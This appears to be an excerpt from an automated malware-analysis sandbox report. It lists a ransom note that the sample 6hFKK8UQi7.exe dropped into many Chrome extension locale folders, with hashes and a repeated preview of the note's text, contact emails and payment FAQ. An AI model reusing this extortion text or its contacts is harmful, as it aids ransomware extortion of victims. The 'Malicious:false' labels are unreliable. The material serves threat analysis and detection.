                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\hi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\hr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\hu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\id\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\it\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ja\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ko\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\lt\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\lv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\nb\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\nl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\pl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ro\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ru\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\sk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\sl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\sr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\sv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\th\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\tr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\uk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\vi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
